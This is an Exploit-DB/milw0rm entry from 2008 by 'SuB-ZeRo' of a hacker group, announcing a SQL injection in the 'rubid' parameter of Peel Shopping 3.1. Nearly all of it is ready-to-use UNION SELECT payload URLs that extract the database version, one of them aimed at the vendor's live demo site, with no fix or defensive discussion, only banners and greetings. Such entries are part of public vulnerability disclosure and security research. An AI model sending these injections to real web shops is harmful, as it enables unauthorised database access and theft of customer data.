Peel Shopping 3.1 - 'rubid' SQL Injection

EDB-ID:

7395

Author:

SuB-ZeRo

Type:

webapps

Platform:

PHP

Published:

2008-12-09

            ############### SuB-ZeRo ###############
             ############### Dz-hackers #################
            PEEL Remote SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Discovred by : SuB-ZeRo
[+]Vendor URL : http://www.peel.fr/
[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html
[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
[+]ConTacTe: FbH@hotmail.com
[+]DoRk: FiNd It (SoOrY)
[+]exploit:
[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3--
[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3--
[+]l!ve demo:
[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3--
 
----------------------------------------------------------------------------------------------------------------------
[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme
----------------------------------------------------------------------------------------------------------------------
SooN sub-z3ro.com

# milw0rm.com [2008-12-09]